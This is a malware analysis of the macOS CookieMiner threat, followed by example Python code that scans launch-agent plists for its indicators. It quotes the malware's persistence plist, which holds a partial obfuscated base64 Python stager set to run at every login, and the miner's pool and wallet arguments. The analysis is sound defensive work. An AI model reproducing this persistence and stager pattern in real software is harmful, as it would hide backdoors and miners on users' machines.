Capabilities: Cryptomining, Cookie/Password Stealing, Backdoor

CookieMiner is likely the evolution of OSX.DarthMiner. (We also covered OSX.DarthMiner in our “The Mac Malware of 2018” report.)

Unit 42 (of Palo Alto Networks), who uncovered CookieMiner and wrote the original report on the malware, made no mention of the malware’s initial infection vector. However, a ThreatPost writeup states that:

"(), deputy director of Threat Intelligence for Unit 42, told Threatpost that researchers are not certain how victims are first infected by the shell script, but they suspect victims download a malicious program from a third-party store." (“Mac ‘CookieMiner’ Malware Aims to Gobble Crypto Funds”)

…as such, CookieMiner’s infection vector remains unknown.

As noted in Unit 42's (), `CookieMiner` persists two launch agents. This is performed during the first stage of the infection, via a shell script named `uploadminer.sh`:

```xml
<dict>
    <key>Label</key>
    <string><!-- label value not captured in the listing --></string>
    <key>ProgramArguments</key>
    <array>
        <string>python</string>
        <string>-c</string>
        <string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode(
'aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml
<!-- middle of the base64 blob not captured in the listing -->
hcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp'))</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
```

As the `RunAtLoad` key is set to `true` in this property list, the python commands will be automatically (re)executed each time the user logs in.

Does this look familiar? Yes! In fact this is exactly how OSX.DarthMiner persisted. In our “The Mac Malware of 2018” report we noted that DarthMiner persists the well-known Empyre backdoor (via the file) and a cryptocurrency mining binary named XMRig (via ). CookieMiner does this as well (though a `2` has been added to both the mining binary and plist). This is not a coincidence, as was noted in the Unit 42 report: “ has been developed from OSX.DarthMiner, a malware known to target the Mac platform”

By examining the arguments passed to the persistent miner binary, `xmrig2`, it appears to be mining the Koto cryptocurrency:

```xml
<key>ProgramArguments</key>
<array>
    <string>/Users/Shared/xmrig2</string>
    <string>-a</string>
    <string>yescrypt</string>
    <string>-o</string>
    <string>stratum+tcp://koto-pool.work:3032</string>
    <string>-u</string>
    <string>k1GqvkK7QYEfMj3JPHieBo1m</string> <!-- wallet address truncated in the listing -->
</array>
```

The persistently installed Empyre backdoor allows remote attackers to run arbitrary commands on an infected host.
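Both launch agents described above share the same tell-tale shape: a `ProgramArguments` array that either hands an inline `exec(base64.b64decode(...))` stager to `python -c`, or points a binary in `/Users/Shared` at a stratum mining pool, with `RunAtLoad` set so it survives logins. The following is an added example (not code from the original report, and not the malware's own code) of how a defender can triage launch-agent plists for exactly those indicators using only Python's standard `plistlib`. The three sample plists are constructed: the `Label` values are placeholders, the stager's base64 blob is only the first chunk shown above (so it is truncated but still decodes), and the benign agent is invented for contrast.

```python
"""Triage macOS launch agent plists for the persistence and mining indicators
discussed above (example code; samples below are constructed, not the real ones)."""
import base64
import plistlib
import re
from typing import Optional

# Constructed sample: the miner agent (placeholder label, arguments as discussed).
MINER_AGENT = b"""<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.example.rig2</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/Shared/xmrig2</string>
    <string>-a</string>
    <string>yescrypt</string>
    <string>-o</string>
    <string>stratum+tcp://koto-pool.work:3032</string>
    <string>-u</string>
    <string>k1GqvkK7QYEfMj3JPHieBo1m</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>"""

# Constructed sample: the python stager agent (placeholder label; base64 blob is
# only the first chunk shown on the page, i.e. a truncated fragment).
STAGER_AGENT = b"""<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.example.proxy2</string>
  <key>ProgramArguments</key>
  <array>
    <string>python</string>
    <string>-c</string>
    <string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml'))</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>"""

# Constructed sample: an ordinary auto-updater agent that should raise no findings.
BENIGN_AGENT = b"""<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
    <string>--check</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>"""

B64_LITERAL = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")
STRATUM_URL = re.compile(r"^stratum\+(?:tcp|ssl)://([^:/]+)(?::(\d+))?")


def decode_inline_stager(script: str) -> Optional[str]:
    """If an inline script exec()s a base64 literal, return the decoded text.
    Padding is repaired so a truncated blob still yields a readable preview."""
    match = B64_LITERAL.search(script)
    if not match:
        return None
    blob = re.sub(r"\s+", "", match.group(1))
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


def triage(plist_bytes: bytes) -> dict:
    """Parse one launch agent and report the indicators described above."""
    agent = plistlib.loads(plist_bytes)
    args = list(agent.get("ProgramArguments") or [])
    program = args[0] if args else agent.get("Program", "")
    report = {"label": agent.get("Label"), "program": program,
              "run_at_load": bool(agent.get("RunAtLoad", False)),
              "pool": None, "wallet": None, "stager": None, "findings": []}

    if program.startswith("/Users/Shared/"):
        report["findings"].append("program lives in world-writable /Users/Shared")

    # Miner arguments: -o <stratum pool> and -u <wallet>, as in the xmrig2 agent.
    for i, arg in enumerate(args):
        if STRATUM_URL.match(arg):
            report["pool"] = STRATUM_URL.match(arg).group(1)
            report["findings"].append(f"stratum mining pool argument: {arg}")
        if arg == "-u" and i + 1 < len(args):
            report["wallet"] = args[i + 1]

    # Inline interpreter stager: python -c '...exec(base64.b64decode(...))'.
    if program.rsplit("/", 1)[-1].startswith("python") and "-c" in args:
        idx = args.index("-c") + 1
        decoded = decode_inline_stager(args[idx] if idx < len(args) else "")
        if decoded is not None:
            report["stager"] = decoded
            report["findings"].append("python -c exec()s a base64-encoded payload")

    if report["run_at_load"] and report["findings"]:
        report["findings"].append("RunAtLoad=true: re-executed at every login")
    return report


if __name__ == "__main__":
    for sample in (MINER_AGENT, STAGER_AGENT, BENIGN_AGENT):
        r = triage(sample)
        print(r["label"], "->", r["findings"] or "no findings")
        if r["stager"]:
            print("  decoded stager preview:", r["stager"][:60])
```

On a real host the same `triage()` can be fed every file under `~/Library/LaunchAgents` and `/Library/LaunchAgents`; decoding the stager rather than just flagging it is what lets an analyst see that the first thing this payload does is check the process list for Little Snitch.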